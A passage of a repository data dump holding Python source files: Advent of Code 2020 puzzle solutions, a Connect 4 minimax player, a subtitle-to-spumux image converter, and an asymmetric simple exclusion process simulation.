d06lib import read_d06\n\ngroups = read_d06()\nprint(sum(len(set(\"\".join(g))) for g in groups))\n" }, { "alpha_fraction": 0.4709762632846832, "alphanum_fraction": 0.49208444356918335, "avg_line_length": 20.657142639160156, "blob_id": "5198931a469b1aad2988c17f2c27aa97a2cc8b56", "content_id": "9e8b8b0ee843909bfa0042ac7a650575c4f82bf1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 758, "license_type": "no_license", "max_line_length": 63, "num_lines": 35, "path": "/py/d03p02.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "from functools import reduce\nfrom operator import mul\n\n\ndef main():\n max_x, max_y, trees = read()\n counts = []\n for dx, 
dy in (1, 1), (3, 1), (5, 1), (7, 1), (1, 2):\n counts.append(count_trees(max_x, max_y, trees, dx, dy))\n mul_count = reduce(mul, counts)\n print(mul_count)\n\n\ndef count_trees(max_x, max_y, trees, dx, dy):\n x, y = 0, 0\n count = 0\n while y <= max_y:\n if (x % max_x, y) in trees:\n count += 1\n x += dx\n y += dy\n return count\n\n\ndef read():\n trees = set()\n for y, line in enumerate(open(\"../inputs/d03-input.txt\")):\n for x, c in enumerate(line):\n if c == \"#\":\n trees.add((x, y))\n return x, y, trees\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5676998496055603, "alphanum_fraction": 0.6215334534645081, "avg_line_length": 28.190475463867188, "blob_id": "fb4701fd940ae63e4c5e875453b7ad44a5f154f9", "content_id": "19171920db731c8556aa5d13e926cc457d4ec306", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 613, "license_type": "no_license", "max_line_length": 94, "num_lines": 21, "path": "/py/d10p02alt.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "import d10lib\n\n\ndef get_result(inputs):\n # via https://www.reddit.com/r/adventofcode/comments/ka8z8x/2020_day_10_solutions/gf9b0zz/\n # https://github.com/bvandewalle/aoc2020/blob/master/10/main.go\n accum = {0: 1}\n for i in inputs:\n accum[i] = accum.get(i - 1, 0) + accum.get(i - 2, 0) + accum.get(i - 3, 0)\n return accum[inputs[-1]]\n\n\ndef main():\n inputs = sorted(d10lib.read_d10())\n inputs.append(inputs[-1] + 3) # built-in adapter\n assert len(set(inputs)) == len(inputs) # sanity check for no duplicates\n print(get_result(inputs))\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5138055086135864, "alphanum_fraction": 0.5690276026725769, "avg_line_length": 25.03125, "blob_id": "c8ff6dc06d9dc9883ad8f04c09f1ff00e56d13ac", "content_id": "38a2d763705dc9e98994f659b4fd11c063b821b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 833, "license_type": "no_license", "max_line_length": 88, "num_lines": 32, "path": "/py/d04p02.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "from string import hexdigits\n\nfrom d04lib import read_d04, good_ecl, required_fields\n\n\ndef validate_hgt(x):\n if x.endswith(\"in\"):\n return 59 <= int(x[:-2]) <= 76\n if x.endswith(\"cm\"):\n return 150 <= int(x[:-2]) <= 193\n return False\n\n\nvalidators = {\n \"byr\": lambda x: 1920 <= int(x) <= 2002,\n \"iyr\": lambda x: 2010 <= int(x) <= 2020,\n \"eyr\": lambda x: 2020 <= int(x) <= 2030,\n \"hgt\": validate_hgt,\n \"hcl\": lambda x: len(x) == 7 and x[0] == \"#\" and all(c in hexdigits for c in x[1:]),\n \"ecl\": lambda x: x in good_ecl,\n \"pid\": lambda x: len(x) == 9 and x.isdigit(),\n \"cid\": lambda x: True,\n}\n\npassports = read_d04()\npassports = [\n p\n for p in passports\n if set(p.keys()) >= required_fields\n and all(validators[key](value) for (key, value) in p.items())\n]\nprint(len(passports))\n" }, { "alpha_fraction": 0.5601577758789062, "alphanum_fraction": 0.5739644765853882, "avg_line_length": 21.04347801208496, "blob_id": "25d48edeae5434fc6da0a49dcc79137ad1b4dd71", "content_id": "4ea7c35de10b6f7766eec9cc0fd4e6e40209ab94", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 507, "license_type": "no_license", "max_line_length": 78, "num_lines": 23, "path": "/py/d07p01.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "from d07lib import read_d07\n\nbag_data = read_d07()\n\n\ndef 
iter_paths(color, path=()):\n has_next = bag_data.get(color, [])\n yield path\n for next_spec in has_next:\n yield from iter_paths(next_spec.color, path=path + (next_spec.color,))\n\n\ndef main():\n roots = set()\n for root_color in bag_data:\n for path in iter_paths(root_color):\n if path and path[-1] == \"shiny gold\":\n roots.add(root_color)\n print(len(roots))\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5471522212028503, "alphanum_fraction": 0.5536881685256958, "avg_line_length": 21.787233352661133, "blob_id": "9d554b9ba7793264daabb435f83b5f6a9ef52f19", "content_id": "219cc5734ad5308c9ea1f538b2dac9999425e2b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1071, "license_type": "no_license", "max_line_length": 49, "num_lines": 47, "path": "/py/d08lib.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "from dataclasses import dataclass, replace\n\n\ndef read_d08(filename=\"../inputs/d08-input.txt\"):\n ops = []\n with open(filename) as f:\n for l in f:\n op, val = l.split(None, 1)\n val = int(val)\n ops.append((op, val))\n return ops\n\n\n@dataclass(frozen=True)\nclass State:\n acc: int\n opc: int\n\n def jmp(self, val):\n return replace(self, opc=self.opc + val)\n\n def modify_acc(self, val):\n return replace(self, acc=self.acc + val)\n\n\ndef run_op(state: State, opt):\n op, val = opt\n if op == \"nop\":\n return state.jmp(1)\n if op == \"acc\":\n return state.modify_acc(val).jmp(1)\n if op == \"jmp\":\n return state.jmp(val)\n raise NotImplementedError(\"...\")\n\n\ndef run_until_loop(state, ops):\n opids_seen = set()\n reason = \"finish\"\n while state.opc < len(ops):\n op = ops[state.opc]\n if state.opc in opids_seen:\n reason = \"loop\"\n break\n opids_seen.add(state.opc)\n state = run_op(state, op)\n return (state, reason, opids_seen)\n" }, { "alpha_fraction": 0.4372294247150421, "alphanum_fraction": 0.46320345997810364, "avg_line_length": 32, "blob_id": "5c5ebe3388b851f88eee6c076844d37c83d33894", "content_id": "a4865ff80cd90884af28516d787bd64fada3f49b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 231, "license_type": "no_license", "max_line_length": 45, "num_lines": 7, "path": "/py/d01p01.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "with open(\"d01-input.txt\", \"r\") as f:\n entries = [int(ent.strip()) for ent in f]\n for i, a in enumerate(entries):\n for b in entries[:i]:\n if a + b == 2020:\n print(a * b)\n break\n" }, { "alpha_fraction": 0.4623015820980072, "alphanum_fraction": 0.4761904776096344, "avg_line_length": 20, "blob_id": "c039ce8188b19b3b65ffdf652f14239ba8232b11", "content_id": "8584933ca6a2e10cd3b1c58b88c2d34190591b37", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 504, "license_type": "no_license", "max_line_length": 60, "num_lines": 24, "path": "/py/d04lib.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "def read_d04():\n SEP = chr(30)\n with open(\"../inputs/d04-input.txt\") as f:\n data = f.read()\n data = data.replace(\"\\n\\n\", SEP)\n data = data.replace(\"\\n\", \" \")\n passports = [\n dict(sorted(p.split(\":\", 1) for p in row))\n for row in (raw.split() for raw in data.split(SEP))\n ]\n return passports\n\n\ngood_ecl = {\"amb\", \"blu\", \"brn\", \"gry\", \"grn\", \"hzl\", \"oth\"}\n\nrequired_fields = {\n \"byr\",\n \"iyr\",\n \"eyr\",\n \"hgt\",\n \"hcl\",\n \"ecl\",\n \"pid\",\n}\n" }, { 
"alpha_fraction": 0.5299714803695679, "alphanum_fraction": 0.5375832319259644, "avg_line_length": 24.634145736694336, "blob_id": "3666a888b878240622a96ae948efceb9bf95d1ad", "content_id": "487c8af870f53c530990b2bcbe61c58dfd4d424c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1051, "license_type": "no_license", "max_line_length": 83, "num_lines": 41, "path": "/py/d07lib.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "import re\nfrom dataclasses import dataclass\n\nline_re = re.compile(r\"^(?P<source>.+?) contain (?P<dest>.+?)\\.$\")\nbag_re = re.compile(r\"(?P<count>\\d+)?\\s*(?P<color>[^,]+) bag[s]?\")\n\n\n@dataclass\nclass BagSpec:\n count: int\n color: str\n\n\ndef to_bagspecs(s):\n for atom in re.split(\",\\s*\", s):\n bag = bag_re.match(atom)\n if not bag:\n print(atom)\n raise NotImplementedError(\"...\")\n if bag.group(0) == \"no other bags\":\n continue\n yield BagSpec(count=int(bag.group(\"count\") or 1), color=bag.group(\"color\"))\n\n\ndef read_d07(filename=\"../inputs/d07-input.txt\"):\n bag_specs = {}\n with open(filename) as f:\n for line in f:\n m = line_re.match(line)\n assert m\n src, dest = m.groups()\n src_bag = next(to_bagspecs(src)).color\n dest_bags = list(to_bagspecs(dest))\n assert src_bag not in bag_specs\n bag_specs[src_bag] = dest_bags\n return bag_specs\n\n\nif __name__ == \"__main__\":\n x = read_d07()\n print(x)\n" }, { "alpha_fraction": 0.5040983557701111, "alphanum_fraction": 0.5327869057655334, "avg_line_length": 29.5, "blob_id": "94d291416188341aca4364c278284cd5714b043f", "content_id": "da98bf3a9c14cbb4a8eeec4478f26202669bf24c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 244, "license_type": "no_license", "max_line_length": 54, "num_lines": 8, "path": "/py/d01p02.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "import itertools\n\nwith open(\"../inputs/d01-input.txt\", \"r\") as f:\n entries = [int(ent.strip()) for ent in f]\n for a, b, c in itertools.combinations(entries, 3):\n if a + b + c == 2020:\n print(a * b * c)\n break\n" }, { "alpha_fraction": 0.5816733241081238, "alphanum_fraction": 0.6015936136245728, "avg_line_length": 24.965517044067383, "blob_id": "7402e757e6d9240af3345d6417247d1eeea77bad", "content_id": "5dc42e90f823d4a570b76bf9f9d51a631d6d2cd9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 753, "license_type": "no_license", "max_line_length": 76, "num_lines": 29, "path": "/py/d10p02.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "from typing import List\n\nimport d10lib\n\n\ndef walk_combos(adapters: List[int], start_index: int, cache: dict):\n if start_index in cache:\n return cache[start_index]\n n = 0\n for next_index in range(start_index + 1, len(adapters)):\n if adapters[next_index] - adapters[start_index] <= 3:\n n += walk_combos(adapters, next_index, cache)\n else:\n break\n n = n or 1\n cache[start_index] = n\n return n\n\n\ndef main():\n inputs = sorted(d10lib.read_d10())\n inputs.insert(0, 0) # virtual zero\n inputs.append(inputs[-1] + 3) # built-in adapter\n assert len(set(inputs)) == len(inputs) # sanity check for no duplicates\n print(walk_combos(inputs, 0, {}))\n\n\nif __name__ == \"__main__\":\n main()\n" } ]
26
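d10p02alt.py above counts adapter arrangements in a single pass with the recurrence accum[i] = accum[i-1] + accum[i-2] + accum[i-3]. A self-contained check of that recurrence against the small example adapter list from the Day 10 puzzle statement, whose published arrangement count is 8:

def count_arrangements(adapters):
    inputs = sorted(adapters)
    inputs.append(inputs[-1] + 3)  # built-in adapter, as in the original
    accum = {0: 1}                 # one way to start at the charging outlet
    for i in inputs:
        accum[i] = accum.get(i - 1, 0) + accum.get(i - 2, 0) + accum.get(i - 3, 0)
    return accum[inputs[-1]]

sample = [16, 10, 15, 5, 1, 11, 7, 19, 6, 12, 4]
print(count_arrangements(sample))  # -> 8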
wsong5077/Connect-4-Board-Game
https://github.com/wsong5077/Connect-4-Board-Game
de1f684775465c4f3f4ab251b548257bf1015692
4280e0782396c59362ad4d44aa99f3a89032d1ad
f8400ba0f797a423fe4db0f65e2dbfaf078ea44f
refs/heads/main
2023-02-11T02:50:00.560045
2021-01-16T07:38:57
2021-01-16T07:38:57
330,109,719
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7142857313156128, "alphanum_fraction": 0.7460317611694336, "avg_line_length": 30.5, "blob_id": "7ec2b49dffc6cc3a966152c796613cd4f074a03d", "content_id": "fec8238628fd30a4e586bb4281f97bb922b7b397", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 63, "license_type": "no_license", "max_line_length": 39, "num_lines": 2, "path": "/README.md", "repo_name": "wsong5077/Connect-4-Board-Game", "src_encoding": "UTF-8", "text": "# Connect-4-Board-Game\nan AI that can play connect 4 with you!\n" }, { "alpha_fraction": 0.5118163228034973, "alphanum_fraction": 0.529034435749054, "avg_line_length": 33.395347595214844, "blob_id": "5ef4c511330b0ad2c27b2da9806b18a19789a876", "content_id": "9468cd0102f55c8d22634f6aab9ad3517fa2a3b5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2962, "license_type": "no_license", "max_line_length": 118, "num_lines": 86, "path": "/Player.py", "repo_name": "wsong5077/Connect-4-Board-Game", "src_encoding": "UTF-8", "text": "#weijia\nfrom Board import *\nimport random\nclass Player:\n \"\"\"Class that defines a Connect 4 player.\"\"\"\n\n def __init__(self, ox, tbt, ply):\n '''\n string ox will be either 'X' or 'O'\n tbt is a string representing the tiebreaking type of the player:either 'LEFT', 'RIGHT', or 'RANDOM'\n ply will be a nonnegative integer representing the number of moves that the player should look into the future\n '''\n self.symbol=ox\n self.tbt=tbt\n self.ply=ply\n\n def __repr__(self):\n output = \"\"\n output += \"Player for \" + self.symbol + \"\\n\"\n output += \" with tiebreak: \" + self.tieRule + \"\\n\"\n output += \" and ply == \" + str(self.ply) + \"\\n\"\n return output\n \n \n def oppChar(self):\n \"\"\"Return the opposite game piece character.\"\"\"\n if self.symbol == \"O\": return \"X\"\n else: return \"O\"\n\n def scoreBoard(self, b):\n \"\"\"Return the score for the given board b.\n 100.0 if the board b is a win for self\n 50.0 if it is neither a win nor a loss for self\n 0.0 if it is a loss for self\"\"\"\n if self.symbol=='X':other='O'\n else:other='X'\n if b.winsFor(self.symbol)==True and b.winsFor(other)!=True: return 100.0\n elif b.winsFor(other)==True and b.winsFor(self.symbol)!=True: return 0.0\n else: return 50.0\n\n\n def tiebreakMove(self, scores):\n \"\"\"Return column number of move based on self.tbt.\"\"\"\n highest=max(scores)\n lst=[]\n for i in range(len(scores)):\n if scores[i]==highest: lst.append(i)\n if self.tbt== 'LEFT':\n return lst[0]\n if self.tbt== 'RIGHT':\n return lst[-1]\n if self.tbt== 'RANDOM':\n return random.choice(lst)\n\n def scoresFor(self, b):\n \"\"\"Return a list of scores for board d, one score for each column\n of the board.\"\"\"\n width=0\n for col in range(b.width):\n width+=1\n lst=[50.0]*width\n for col in range(b.width):\n if b.allowsMove(col)==False:\n lst[col]=-1.0\n elif self.scoreBoard(b)==100.0:\n lst[col]=100.0\n elif self.scoreBoard(b)==0.0:\n lst[col]=0.0\n elif self.ply==0:\n lst[col]=50.0\n else:\n b.addMove(col,self.symbol)\n if b.isFull()==True: \n lst[col]=50.0\n else:\n lst_op_score=Player(self.oppChar(), self.tbt, self.ply-1).scoresFor(b)\n lst[col]=100-max(lst_op_score)\n b.delMove(col)\n return lst\n\n def nextMove(self, b):\n \"\"\"Accepts a board input and returns the next move for this player,\n where a move is a column in which the player should place its\n game piece.\"\"\"\n scores=self.scoresFor(b)\n return 
self.tiebreakMove(scores)\n\n\n\t\n" } ]
2
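Player.tiebreakMove above picks among the equally best columns according to the player's tiebreak type. The same rule restated standalone, with a made-up score list in which -1.0 marks a full column, as in scoresFor:

import random

def tiebreak(scores, tbt):
    best = max(scores)
    candidates = [c for c, s in enumerate(scores) if s == best]
    if tbt == 'LEFT':
        return candidates[0]
    if tbt == 'RIGHT':
        return candidates[-1]
    return random.choice(candidates)  # 'RANDOM'

print(tiebreak([50.0, 100.0, 50.0, 100.0, -1.0], 'LEFT'))   # -> 1
print(tiebreak([50.0, 100.0, 50.0, 100.0, -1.0], 'RIGHT'))  # -> 3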
aalien/subtitle2spu
https://github.com/aalien/subtitle2spu
722fe65fb7d7e4c63a76df197c7e75fc4124e963
3ede0b864bfa96e12cd85e1927ace75db473e448
574ce9653244b8becf6afa435c5040c1cb88aff0
refs/heads/master
2020-04-05T21:32:19.927482
2013-01-16T16:42:56
2013-01-16T16:42:56
7,649,488
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5006700754165649, "alphanum_fraction": 0.5017421841621399, "avg_line_length": 31.434782028198242, "blob_id": "6c39ec686be6c7718e5f3f3b61db3b7248e1deed", "content_id": "51cd56581d74b2d1989ebd479155ad3a0955a47d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3731, "license_type": "permissive", "max_line_length": 78, "num_lines": 115, "path": "/writer.py", "repo_name": "aalien/subtitle2spu", "src_encoding": "UTF-8", "text": "import sys\nimport os\n\nclass SubtitleWriter:\n \"\"\" Writer module for parsers\n \"\"\"\n def __init__( self, font, fontsize, fillcolor, outlinecolor, outlinewidth,\n resolution ):\n \"\"\" Initializer\n \n Parameters:\n font: Name of the font used for subtitles\n fontsize: Size of the font used for subtitles\n fillcolor: Color to fill the text with\n outlinecolor: Color for the outline of the text\n outlinewidth: Width of the texts' outline\n resolution: Resolution of the movie\n \"\"\"\n # Template for convert command\n self.convert = (\n \"convert -size %(resolution)s xc:none \" +\n \"-fill %(fillcolor)s -stroke %(strokecolor)s \" +\n \"-strokewidth %(strokewidth)s -font %(fontname)s \" +\n \"-pointsize %(fontsize)s +antialias -colors 4 -gravity south \"\n ) % {\n \"resolution\": resolution,\n \"fillcolor\": fillcolor,\n \"strokecolor\": outlinecolor,\n \"strokewidth\": outlinewidth,\n \"fontname\": font,\n \"fontsize\": fontsize\n } + \"-draw \\\"text 0,10 '%(subtext)s'\\\" %(filename)s\"\n\n # Template for xml subtitle item\n self.spunode = (\n \"\\t<spu start=\\\"%(starttime)s\\\" end=\\\"%(endtime)s\\\" \" +\n \"image=\\\"%(filename)s\\\" />\\n\"\n )\n \n def open( self, outfilename ):\n \"\"\" Opens a file for xml output\n\n Parameters:\n outfilename: Name for output file or - for stdout\n\n Returns:\n True if outputfile was opened and written succesfully,\n False otherwise\n \"\"\"\n if outfilename == \"-\":\n self.outfile = sys.stdout\n else:\n try:\n self.outfile = open( outfilename, \"w\" )\n except:\n return False\n try:\n self.outfile.write( \"<subpictures>\\n\" )\n self.outfile.write( \" <stream>\\n\" )\n except:\n if self.outfile != sys.stdout:\n self.outfile.close()\n return False\n return True\n\n def write( self, number, starttime, endtime, text,\n filename=\"subtitle_%s.png\" ): \n \"\"\" Writer function that parsers should call\n \n Parameters:\n number: Running number for the subtitle\n starttime, endtime: start and end time of the subtitle\n text: subtitle's text\n filename: filename for subtitle image\n\n Returns:\n True if subtitle was written succesfully,\n False otherwise\n \"\"\"\n # Fill in the templates\n command = self.convert % {\n \"subtext\": text.replace( \"\\'\", \"\\\\\\'\" ).replace( \"\\\"\", \"\\\\\\\"\" ),\n \"filename\": filename % number\n }\n\n node = self.spunode % {\n \"starttime\": starttime,\n \"endtime\": endtime,\n \"filename\": filename % number\n }\n \n print command\n os.system( command )\n try:\n self.outfile.write( node )\n except:\n return False\n return True\n\n def close( self ):\n \"\"\" Finalizer function which closes the output file\n\n Returns:\n True if output file was written and closed succesfully,\n False otherwise\n \"\"\"\n try:\n self.outfile.write( \" </stream>\\n\" )\n self.outfile.write( \"</subpictures>\\n\" )\n except:\n return False\n finally:\n if self.outfile != sys.stdout:\n self.outfile.close()\n return True\n\n" }, { "alpha_fraction": 0.5736568570137024, "alphanum_fraction": 0.5863662362098694, 
"avg_line_length": 26.4761905670166, "blob_id": "9c3f7b98450686c41ccb5bf7bad60e54f85ec0c3", "content_id": "e7129aaaf5f828bb1bfed2c034aac3bc17da417c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3462, "license_type": "permissive", "max_line_length": 82, "num_lines": 126, "path": "/subtitle2spu.py", "repo_name": "aalien/subtitle2spu", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n#\n# subtitle2spu.\n# Creates png images and an xml file from subtitles for use with spumux.\n# Copyright (C) 2008 Antti Laine <[email protected]>\n\nimport os\nimport sys\nimport getopt\n\nfrom writer import SubtitleWriter\n\ndef showUsage():\n print \"\"\"\nUsage: subtitle2spu [OPTION] FILE\n\n --font=FONT\\tsubtitle font\n\\t\\t\\tdefault is Arial-Bold\n\\t\\t\\tconvert -list font for available fonts\n --fill=COLOR\\tfill color\n\\t\\t\\tdefault is white\n --outline=COLOR\\toutline color\n\\t\\t\\tdefault is black\n\\t\\t\\tconvert -list color for available colors\n --resolution=WIDTHxHEIGHT\\tresolution of the movie\n\\t\\t\\tdefault is 720x576 (PAL)\n --type=TYPE\\tType of the input file\n\\t\\t\\tDefault is srt\n\\t\\t\\tSupported values: srt\n\n --help, -h\\t\\tdisplay this help text\n --version, -v\\t\\tdisplay version information\n\"\"\"\n\ndef showVersion():\n print \"\"\"\nsubtitle2spu 0.2\nCopyright (C) 2008 Antti Laine <[email protected]>\nLicense GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>\nThis is free software: you are free to change and redistribute it.\nThere is NO WARRANTY. See COPYING for details.\n\"\"\"\n\ndef main():\n # default values for options\n font = \"Arial-Bold\"\n fontsize = \"28\"\n fillcolor = \"White\"\n outlinecolor = \"Black\"\n outlinewidth = \"2\"\n resolution = \"720x576\"\n type = \"srt\"\n outputfilename = \"-\"\n\n try:\n options, arguments = getopt.getopt(\n sys.argv[1:],\n \"hvo:\", \n [\"font=\", \"fill=\", \"outline=\", \"resolution=\", \"type=\",\n \"output=\", \"help\", \"version\"]\n )\n except:\n showUsage()\n return 1\n\n print options\n print arguments\n\n for option, value in options:\n if option == \"--font\":\n font = value\n elif option == \"--fill\":\n fillcolor = value\n elif option == \"--outline\":\n outlinecolor = value\n elif option == \"--resolution\":\n resolution = value\n elif option == \"--type\":\n type = value\n elif option in (\"--output\", \"-o\"):\n outputfilename = value\n elif option in (\"--help\", \"-h\"):\n showUsage()\n return 0\n elif option in (\"--version\", \"-v\"):\n showVersion()\n return 0\n else:\n showUsage()\n return 1\n\n if len(arguments) == 0:\n inputfilename = \"stdin\"\n inputfile = sys.stdin\n elif len(arguments) == 1:\n inputfilename = arguments[0]\n try:\n inputfile = open( inputfilename, \"r\" )\n except:\n print \"Failed open %s\" %(inputfilename)\n return 1\n else:\n print \"Provide exactly ONE input file.\"\n return 1\n \n if type not in ( \"srt\" ):\n print \"Only Subrip format is supported at the moment.\"\n return 1\n import parsesrt\n\n subtitlewriter = SubtitleWriter( font, fontsize, fillcolor, outlinecolor,\n outlinewidth, resolution ) \n if not subtitlewriter.open(outputfilename):\n print \"Failed to open %s\" %( subtitlewriter.outputfile )\n return 1\n if not parsesrt.parse( inputfile, subtitlewriter ):\n print \"Failed to parse %s\" %( inputfilename )\n if inputfilename != \"stdin\":\n inputfile.close()\n if not subtitlewriter.close():\n print \"Failed to write to %s after parsing\" %( 
subtitlewriter.outputfile )\n return 1\n return 0\n\nif __name__ == \"__main__\":\n sys.exit( main() )\n" }, { "alpha_fraction": 0.5690809488296509, "alphanum_fraction": 0.5806451439857483, "avg_line_length": 29.98113250732422, "blob_id": "dfa037b7777324451e0447f4a3fdff46dfe27b2e", "content_id": "9a047b0b775222314efe73746ef81b9298cefa95", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1643, "license_type": "permissive", "max_line_length": 73, "num_lines": 53, "path": "/parsesrt.py", "repo_name": "aalien/subtitle2spu", "src_encoding": "UTF-8", "text": "# Copyright (C) 2008 Antti Laine <[email protected]>\n#\n# This file is part of subtitle2spu.\n#\n# subtitle2spu is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# subtitle2spu is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with subtitle2spu. If not, see <http://www.gnu.org/licenses/>.\n\nimport sys\n\n# States\nREADNUMBER = 1\nREADTIME = 2\nREADTEXT = 3\n\ndef parse( file, writer ):\n state = READNUMBER\n linecount = 0\n lines = \"\"\n\n for buf in file:\n if not buf:\n continue\n if state == READNUMBER:\n number = buf.split()[0]\n state = READTIME\n continue\n if state == READTIME:\n starttime = buf.split()[0]\n endtime = buf.split()[2]\n state = READTEXT\n continue\n if state == READTEXT:\n if buf[0] not in (\"\\n\", \"\\r\"):\n linecount += 1\n lines += buf\n else:\n print \"Writing subtitle %s\" %(number)\n if not writer.write( number, starttime, endtime, lines ):\n return False\n state = READNUMBER\n linecount = 0\n lines = \"\"\n return True\n\n" } ]
3
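SubtitleWriter.write above fills two templates per subtitle: an ImageMagick convert command and an spumux <spu> node. A dry run of just the XML template with made-up times and a filename (no convert call; it only prints the node string):

spunode = ("\t<spu start=\"%(starttime)s\" end=\"%(endtime)s\" "
           "image=\"%(filename)s\" />\n")
node = spunode % {
    "starttime": "00:00:01.600",   # hypothetical timestamps
    "endtime": "00:00:04.120",
    "filename": "subtitle_1.png",
}
print(node)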
shimagaki/ASEP_inverseASEP
https://github.com/shimagaki/ASEP_inverseASEP
fe5d0b1a39d868beb396ab7c83738af40a40c899
345f6a09da070f42c7d0f2cedc263144c482e0b2
0bca786fa1cc472048a7c5c18c0ddd24b6490e2d
refs/heads/master
2021-11-20T03:05:49.397413
2021-08-09T22:12:42
2021-08-09T22:12:42
98,703,892
1
0
null
2017-07-29T02:53:04
2021-05-12T15:56:38
2021-07-20T20:35:05
null
[ { "alpha_fraction": 0.7575757503509521, "alphanum_fraction": 0.7575757503509521, "avg_line_length": 31, "blob_id": "4ef829ef18d1ea50d0e9f192cb270e60055691bb", "content_id": "df429a73edbcb0027d5aca8fd1effb89203bca24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 33, "license_type": "no_license", "max_line_length": 31, "num_lines": 1, "path": "/README.md", "repo_name": "shimagaki/ASEP_inverseASEP", "src_encoding": "UTF-8", "text": "# ASEP and inverse ASEP problem\n\n" }, { "alpha_fraction": 0.4975988268852234, "alphanum_fraction": 0.5182859301567078, "avg_line_length": 25.539215087890625, "blob_id": "53385e7ec2bfd441a794366b5543cbf079352a43", "content_id": "17061979486cbb0d4ba971d4fc01399284d79083", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2707, "license_type": "no_license", "max_line_length": 100, "num_lines": 102, "path": "/cyclic_ASEP.py", "repo_name": "shimagaki/ASEP_inverseASEP", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*- \nimport numpy as np\nimport matplotlib.pyplot as plt\n\"\"\"periodic boundary condition\"\"\"\nK = 5; L = 10\n\nclass Particle_Class:\n \"\"\"particles class \n \"\"\"\n def __init__(self,i,x,mu,n):\n self.id = i \n self.x=x\n self.mu = mu \n self.n = n \n \n def set_x(self,x):\n self.x = x \n \n def get_x(self):\n return self.x\n \n def set_n(self,n):\n self.n = n\n\n def get_n(self):\n return self.n\n \n def get_mu(self):\n return self.mu\n \n\ndef init_particles():\n global particles\n \n #------ location -------#\n location = np.arange(L)\n np.random.shuffle(location)\n location = np.sort( np.copy(location[:K]) ) #ex. 0,1,2,3,4,5 -> 0,2,3,5\n \n #------ transfer coefficient -------#\n trans_coeff = np.random.uniform(0,1,K)\n trans_coeff = np.copy(trans_coeff) / np.sum(trans_coeff)\n for i in range(K):\n vacancy_i = ( location[(i+1)%K]-location[i] + L ) % L - 1 \n particles.append( Particle_Class( i, location[i], trans_coeff[i], vacancy_i ) )\n\ndef update():\n global particles \n for i in range(K):\n if(particles[i].n>0):\n if( np.random.uniform() < particles[i].get_mu() ):\n \n x = particles[i].get_x() \n n = particles[i].get_n() \n n_minus = particles[ (i-1+K)%K ].get_n() \n \n particles[i].set_x( (x+1)%L )\n \n particles[i].set_n( n-1 )\n particles[ (i-1+K)%K ].set_n( n_minus + 1 )\n \ndef print_state():\n for i in range(K): \n print i, \",\", particles[i].id, \",\",particles[i].x, \",\", particles[i].mu, \",\", particles[i].n\n\ndef output_state_to_file():\n global f_location, f_vacancy\n for i in range(K):\n f_location.write( str(particles[i].x) + \" \" )\n f_vacancy.write( str(particles[i].n) + \" \" )\n f_location.write(\"\\n\")\n f_vacancy.write(\"\\n\")\n\nif __name__ == \"__main__\":\n particles = []\n init_particles()\n \n fname_location = \"location_K10_L15_N1000000_Twait10.dat\"\n fname_vacancy = \"vacancy_K10_L15_N1000000_Twait10.dat\"\n fname_trans_coeff = \"trans_coeff_.dat\"\n f_location = open(fname_location,\"w\")\n f_vacancy = open(fname_vacancy,\"w\")\n f_trans_coeff = open(fname_trans_coeff,\"w\")\n \n for i in range(K):f_trans_coeff.write( str(particles[i].mu) + \" \" )\n f_trans_coeff.close()\n \n sample_size = 100\n t_wait = 10\n for t in range(sample_size*t_wait):\n update()\n if(t%t_wait == 0):\n output_state_to_file()\n \"\"\" \n print_state() \n print \"\"\n update()\n print_state() \n \"\"\" \n\n f_location.close()\n f_vacancy.close()\n" }, { "alpha_fraction": 0.5488545894622803, 
